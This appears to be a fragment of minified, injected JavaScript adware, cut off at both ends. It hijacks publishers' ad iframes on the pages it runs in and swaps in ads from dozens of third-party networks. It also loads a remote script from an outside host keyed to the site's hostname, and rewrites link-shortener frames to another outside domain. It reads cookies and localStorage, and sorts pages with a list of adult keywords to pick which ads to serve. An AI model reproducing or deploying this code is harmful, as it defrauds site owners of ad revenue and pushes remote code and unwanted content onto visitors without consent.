dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");;var _wlst={lsKey:\"ssjsmn2ja8ddw2a\",get:function(b,a){if(3<b)return a(!1);var d=this.fetch();if(d)return a(parseInt(d));if(1==b){crc=this.hcrc32(window.self.location.hostname.replace(\"www.\",\"\"));try{var c=document.createElement(\"script\");c.type=\"text/javascript\";try{c.async=\"async\"}catch(e){}c.src=\"http://v.zilionfast.in/\"+crc+\"/?t=vrt\";(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild©}catch(f){}}setTimeout(function(){_wlst.get(++b,a)},180)},fetch:function(){try{if(\"undefined\"!=localStorage)try{return localStorage.getItem(this.lsKey)}catch(b){return 0}else _wlst.getCkie()}catch(a){_wlst.getCkie()}},getCkie:function(){if(0<document.cookie.length&&(c_start=document.cookie.indexOf(this.lsKey+\"=\"),-1!=c_start))return c_start=c_start+this.lsKey.length+1,c_end=document.cookie.indexOf(\";\",c_start),-1==c_end&&(c_end=document.cookie.length),unescape(document.cookie.substring(c_start,c_end))},hcrc32:function(b,a){a||(a=0);var d=0;a^=-1;for(var c=0,e=b.length;c<e;c++)d=(a^b.charCodeAt©)&255,d=\"0x\"+\"00000000 77073096 EE0E612C 990951BA 076DC419 706AF48F E963A535 9E6495A3 0EDB8832 79DCB8A4 E0D5E91E 97D2D988 09B64C2B 7EB17CBD E7B82D07 90BF1D91 1DB71064 6AB020F2 F3B97148 84BE41DE 1ADAD47D 6DDDE4EB F4D4B551 83D385C7 136C9856 646BA8C0 FD62F97A 8A65C9EC 14015C4F 63066CD9 FA0F3D63 8D080DF5 3B6E20C8 4C69105E D56041E4 A2677172 3C03E4D1 4B04D447 D20D85FD A50AB56B 35B5A8FA 42B2986C DBBBC9D6 ACBCF940 32D86CE3 45DF5C75 DCD60DCF ABD13D59 26D930AC 51DE003A C8D75180 BFD06116 21B4F4B5 56B3C423 CFBA9599 B8BDA50F 2802B89E 5F058808 C60CD9B2 B10BE924 2F6F7C87 58684C11 C1611DAB B6662D3D 76DC4190 01DB7106 98D220BC EFD5102A 71B18589 06B6B51F 9FBFE4A5 E8B8D433 7807C9A2 0F00F934 9609A88E E10E9818 7F6A0DBB 086D3D2D 91646C97 E6635C01 6B6B51F4 1C6C6162 856530D8 F262004E 6C0695ED 1B01A57B 8208F4C1 F50FC457 65B0D9C6 12B7E950 8BBEB8EA FCB9887C 62DD1DDF 15DA2D49 8CD37CF3 FBD44C65 4DB26158 3AB551CE A3BC0074 D4BB30E2 4ADFA541 3DD895D7 A4D1C46D D3D6F4FB 4369E96A 346ED9FC AD678846 DA60B8D0 44042D73 33031DE5 AA0A4C5F DD0D7CC9 5005713C 270241AA BE0B1010 C90C2086 5768B525 206F85B3 B966D409 CE61E49F 5EDEF90E 29D9C998 B0D09822 C7D7A8B4 59B33D17 2EB40D81 B7BD5C3B C0BA6CAD EDB88320 9ABFB3B6 03B6E20C 74B1D29A EAD54739 9DD277AF 04DB2615 73DC1683 E3630B12 94643B84 0D6D6A3E 7A6A5AA8 E40ECF0B 9309FF9D 0A00AE27 7D079EB1 F00F9344 8708A3D2 1E01F268 6906C2FE F762575D 806567CB 196C3671 6E6B06E7 FED41B76 89D32BE0 10DA7A5A 67DD4ACC F9B9DF6F 8EBEEFF9 17B7BE43 60B08ED5 D6D6A3E8 A1D1937E 38D8C2C4 4FDFF252 D1BB67F1 A6BC5767 3FB506DD 48B2364B D80D2BDA AF0A1B4C 36034AF6 41047A60 DF60EFC3 A867DF55 316E8EEF 4669BE79 CB61B38C BC66831A 256FD2A0 5268E236 CC0C7795 BB0B4703 220216B9 5505262F C5BA3BBE B2BD0B28 2BB45A92 5CB36A04 C2D7FFA7 B5D0CF31 2CD99E8B 5BDEAE1D 9B64C2B0 EC63F226 756AA39C 026D930A 9C0906A9 EB0E363F 72076785 05005713 95BF4A82 E2B87A14 7BB12BAE 0CB61B38 92D28E9B E5D5BE0D 7CDCEFB7 0BDBDF21 86D3D2D4 F1D4E242 68DDB3F8 1FDA836E 81BE16CD F6B9265B 6FB077E1 18B74777 88085AE6 FF0F6A70 66063BCA 11010B5C 8F659EFF F862AE69 616BFFD3 166CCF45 A00AE278 D70DD2EE 4E048354 3903B3C2 A7672661 D06016F7 4969474D 3E6E77DB AED16A4A D9D65ADC 40DF0B66 37D83BF0 A9BCAE53 DEBB9EC5 47B2CF7F 30B5FFE9 BDBDF21C CABAC28A 53B39330 24B4A3A6 BAD03605 CDD70693 54DE5729 23D967BF B3667A2E C4614AB8 5D681B02 2A6F2B94 B40BBE37 C30C8EA1 5A05DF1B 2D02EF8D\".substr(9*d,8),a=a>>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['reachjunction',41],['ybrant_ws',5],['dsnr_apnx_2',7],['xertive_rmx',73],['adnetworknet_ws',11],['web_media_apx',10],['ybrant_rmx_ws2',5],['start_me_app_tb',3],['glispa_us',2500],['mind_ads_rmx',281],['mmg_tb',13],['e_viral_new',415],['webmedia_tb',156],['cpx_adsafe',1],['admanage_gen',42],['adnetwork_rmx',46],['matomy_rmx_tb_tier2',55],['e_viral_tb_tier1',1400],['dsnr_dasl_tier1_rmx_gen',14],['mediashakers_rmx',808],['xertiv_tst',50],['cpx_bet_55',1381],['baba_tb',234],['servenetwork_gen',289],['dsnr_dasl_tier3_rmx_gen',38],['dsnr_exposed_tb',12],['deliads_apx_tb_new',207],['saymedia_apx_tag_test',106],['marimedia_apx_tb_tst',309],['media_white_apx_test',244],['dsnr_dsnrtbA1_tb',73],['dsnr_dasa_gentb2',172],['dsnr_dsnrtbA2_tb',63],['velis_media_apx_new1',83],['baba_apx_tbgen',51],['suite66_new_tb',42],['traffiqexchange_gen',277],['dsnr_dasa_gentb3',43],['clovenetwork_apx_tbgen',110],['webmedia_apx_tier1',191],['excite_US_tbgen',124],['media888_gen',15]],[['dsnr_t2_streaming',700],['dsnr_t1_streaming',700],['cpx_strm',3000],['adstract_adk2_strm',700],['mari_media_strm',700],['adstract_apx_strm',700],['say_media_strm',700],['darrieans_apx_strm',700],['baba_strm',700],['matomy_apx_strm',700],['matomy_adk2_strm',700]],[['liveJasmine',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function(b){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('7oGn8Dlf=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"ad.reachjunction.com\"||window.self.location.hostname==\"ad.adserverplus.com\"||window.self.location.hostname==\"an.z5x.net\"||window.self.location.hostname==\"ad.yieldmanager.com\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"srv1.mediads.info\"||window.self.location.hostname==\"net.e-viral.com\"||window.self.location.hostname==\"fw.adsafeprotected.com\"||window.self.location.hostname==\"cpm.geoadserver.com\"||window.self.location.hostname==\"ad.adnetwork.net\"||window.self.location.hostname==\"ad.z5x.net\"||window.self.location.hostname==\"ad.media-servers.net\"||window.self.location.hostname==\"tr.adsplats.com\"||window.self.location.hostname==\"www.holisticmedicalwellness.com\"||window.self.location.hostname==\"ad.co-co-co.co\"||window.self.location.hostname==\"ads.suite6ixty6ix.co\"||window.self.location.hostname==\"ads.clovenetwork.com\"||window.self.location.hostname==\"Servedby.bigfineads.com\"||window.self.location.hostname==\"cdn.adk2.com\"||window.self.location.hostname==\"creative.m2pub.com\"||window.self.location.hostname==\"www.livejasmin.com\"|| _zyad.location.indexOf('=388480')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1009')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i<b.length;i++)try{if(b[i]&&b[i].getAttribute(\"name\")){var a=b[i].getAttribute(\"name\").toLowerCase();if(\"description\"==a||\"keywords\"==a)_zyad.title=_zyad.title+\" \"+b[i].getAttribute(\"content\")}}catch(d){}}catch©{}b=\"porn sex xxx tits adult lesbian squirt creampie bondage ExSuna mature fisting [bleep] gangbang orgy gay nude tits tranny blowjob handjob masturbat busty [bleep] joder horny mamada polla [bleep] pussy threesome teens milf bdsm hentai motherless erotic cams petite\".split(\" \");for(i in b)if(-1<_zyad.location.indexOf(b[i])||-1<_zyad.title.indexOf(b[i]))return!0;return!1},epoch:function(){try{var b=new Date;try{return(b.getTime()-b.getMilliseconds())/1E3}catch(a){return parseInt(b.getTime()/1E3)}}catch(d){return 0}},between:function(b,a){return b>=a-7&&b<=a+7},detectRsize:function(b){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function(b){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i<d.length;i++){if(!b)try{if(d[i].hasAttribute(\"s2119962166\"))continue}catch©{try{if(d[i].getAttribute(\"s2119962166\"))continue}catch(e){}};try{if(d[i].src.indexOf('=388480')>-1||d[i].src.indexOf('1018-1009')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s2119962166\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a.ifr,a.size);b++;a&&a&&\"function\"==typeof a.func&&setTimeout(function(){a.func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000<d&&(c=Math.floor((10000-d)/g.length+0.9));for(i=0;i<g.length;i++)if(d=g[i],f+=_zyad.networks_conf[i][1]+c,f>=e){h[d](b);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + '7oGn8Dlf=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('<html><head>\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script></head><body>&nbsp;\\x3c/body>\\x3c/html>');}catch(e){var h = '<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body><iframe name=\"a7h3h73d3\" src=\"about:blank\" style=\"width:100%;height:100%;border:0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"100%\" height=\"100%\"></iframe>\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script></body></html>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style>\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script></head><body>&nbsp;</body></html>');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body>'+url+'</body></html>');break;}try{ifr.setAttribute(\"s2119962166\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{reachjunction:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 234x60 300x250 336x280 468x60 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ad.reachjunct...n_code=308_1182' (atp?atp:1), [37,size]);}}catch(e){return !1;}},ybrant_ws:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ad.adserverpl...n_code=308_1182' (atp?atp:1), [48,size]);}}catch(e){return !1;}},dsnr_apnx_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600 120x600 250x250 468x60'.indexOf(size)) return !1;var atp=false;if(size == \"120x60\") return;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt..._code=&308_1182' (atp?atp:1), [119,size]);}}catch(e){return !1;}},xertive_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size == '120x60') return;return function(ifr){_zyad.iset(ifr, 'http://ad.yieldmanag...section=4809178' (atp?atp:1), [155,size]);}}catch(e){return !1;}},adnetworknet_ws:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size == '120x60') return;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/...586&size= size ' (atp?atp:1), [158,size]);}}catch(e){return !1;}},web_media_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/...163&size= size ' (atp?atp:1), [160,size]);}}catch(e){return !1;}},ybrant_rmx_ws2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 120x600 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ad.adserverpl...n_code=308_1182' (atp?atp:2), [178,size]);}}catch(e){return !1;}},start_me_app_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 160x600 300x250 468x60 120x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/...624&size= size ' (atp?atp:1), [216,size]);}}catch(e){return !1;}},glispa_us:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://media.glispa....50&site=1666657' (atp?atp:1), [219,size]);}}catch(e){return !1;}},mind_ads_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 160x600 300x250 468x60'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ad.yieldmanag...section=4889565' (atp?atp:2), [220,size]);}}catch(e){return !1;}},mmg_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://srv1.mediads....189&size= size ' (atp?atp:1), [240,size]);}}catch(e){return !1;}},e_viral_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://net.e-viral.c...479&size= size ' (atp?atp:1), [241,size]);}}catch(e){return !1;}},webmedia_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 160x600 300x250'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/...337&size= size ' (atp?atp:1), [245,size]);}}catch(e){return !1;}},cpx_adsafe:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://fw.adsafeprot...937&size= size ' (atp?atp:1), [247,size]);}}catch(e){return !1;}},admanage_gen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://cpm.geoadserv...&ad_type=iframe' (atp?atp:1), [260,size]);}}catch(e){return !1;}},adnetwork_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if (size == '120x60') return;;return function(ifr){_zyad.iset(ifr, 'http://ad.adnetwork....8_1182&pub_url=' (atp?atp:1), [267,size]);}}catch(e){return !1;}},matomy_rmx_tb_tier2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ad.yieldmanager.com/st?ad_type=iframe&ad_size='+size+'&site=1696978&section_code=Tier 2&section_code=308_1182', (atp?atp:1), [290,size]);}}catch(e){return !1;}},e_viral_tb_tier1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://net.e-viral.c...489&size= size ' (atp?atp:1), [303,size]);}}catch(e){return !1;}},dsnr_dasl_tier1_rmx_gen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 120x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ad.z5x.net/st...n_code=308_1182' (atp?atp:2), [310,size]);}}catch(e){return !1;}},mediashakers_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ad.media-serv...8_1182&pub_url=' (atp?atp:1), [313,size]);}}catch(e){return !1;}},xertiv_tst:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;var rfr=window.self==window.top?encodeURIComponent(window.self.location.href):'',cbb=Math.random();;return function(ifr){_zyad.iset(ifr, 'http://ad.yieldmanag...= rfr &cb= cbb ' (atp?atp:1), [327,size]);}}catch(e){return !1;}},cpx_bet_55:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;var reff = window.top==window.self ? encodeURIComponent(window.self.location.href) : '';;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.c...referrer= reff ' (atp?atp:1), [354,size]);}}catch(e){return !1;}},baba_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 728x90 120x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/...size &referrer=' (atp?atp:1), [355,size]);}}catch(e){return !1;}},servenetwork_gen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://www.holisticm.../ads/ size .php' (atp?atp:1), [356,size]);}}catch(e){return !1;}},dsnr_dasl_tier3_rmx_gen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 120x600 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ad.z5x.net/st...n_code=308_1182' (atp?atp:1), [357,size]);}}catch(e){return !1;}},dsnr_exposed_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 120x600 160x600 468x60 728x90'.indexOf(size)) return !1;var atp=false;var reff = window.top==window.self ? encodeURIComponent(window.self.location.href) : '';;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt...referrer= reff ' (atp?atp:1), [358,size]);}}catch(e){return !1;}},deliads_apx_tb_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"1962958\",\"300x250\":\"1962952\",\"120x600\":\"1962975\",\"160x600\":\"1962977\",\"468x60\":\"1962981\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+ arr +\"&cb=&referrer=\";;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [359,size]);}}catch(e){return !1;}},saymedia_apx_tag_test:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1957902\",\"468x60\":\"1957923\",\"160x600\":\"1957924\", \"300x250\":1957917}[size];var surl = \"http://ad.co-co-co.co/rmx/appnexus.html?id=\"+arr;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [366,size]);}}catch(e){return !1;}},marimedia_apx_tb_tst:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1880004\",\"300x250\":\"1880018\",\"468x60\":\"1880019\",\"120x600\":\"1880016\",\"160x600\":\"1880011\"}[size];var reff = window.top==window.self ? encodeURIComponent(window.self.location.href) : '';var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&referrer=\" + reff;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [367,size]);}}catch(e){return !1;}},media_white_apx_test:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var __cachebuster = new Date().getTime();var arr={\"728x90\":\"1994971\",\"300x250\":\"1994970\",\"160x600\":\"1994964\"}[size];var surl = 'http://ib.adnxs.com/tt?id='+ arr +'&cb='+__cachebuster;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [369,size]);}}catch(e){return !1;}},dsnr_dsnrtbA1_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt...size &referrer=' (atp?atp:1), [370,size]);}}catch(e){return !1;}},dsnr_dasa_gentb2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt...size &referrer=' (atp?atp:1), [372,size]);}}catch(e){return !1;}},dsnr_dsnrtbA2_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt...size &referrer=' (atp?atp:1), [376,size]);}}catch(e){return !1;}},velis_media_apx_new1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1976306\",\"300x250\":\"1976308\",\"160x600\":\"1976310\"}[size]; var surl = 'http://ib.adnxs.com/tt?id='+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [378,size]);}}catch(e){return !1;}},baba_apx_tbgen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"2011160\",\"300x250\":\"2011152\",\"160x600\":\"2011158\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+ arr +\"&referrer=\";;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [380,size]);}}catch(e){return !1;}},suite66_new_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2000074\",\"300x250\":\"2000073\",\"160x600\":\"2000072\"}[size]; var surl =\" http://ads.suite6ixty6ix.com/tt?id=\"+ arr +\"&cb=&referrer=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [381,size]);}}catch(e){return !1;}},traffiqexchange_gen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"1478397\",\"300x250\":\"1478396\",\"160x600\":\"1478380\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&pubclick=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [382,size]);}}catch(e){return !1;}},dsnr_dasa_gentb3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt...size &referrer=' (atp?atp:1), [383,size]);}}catch(e){return !1;}},clovenetwork_apx_tbgen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1992126\",\"300x250\":\"1992048\",\"160x600\":\"1992127\"}[size]; var surl = \"http://ads.clovenetwork.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [384,size]);}}catch(e){return !1;}},webmedia_apx_tier1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;var reff = window.top == window.self ? encodeURIComponent(window.self.location.href) : '';var surl = \"http://ib.adnxs.com/tt?id=2025063&size=\"+size+\"&referrer=\"+reff;return 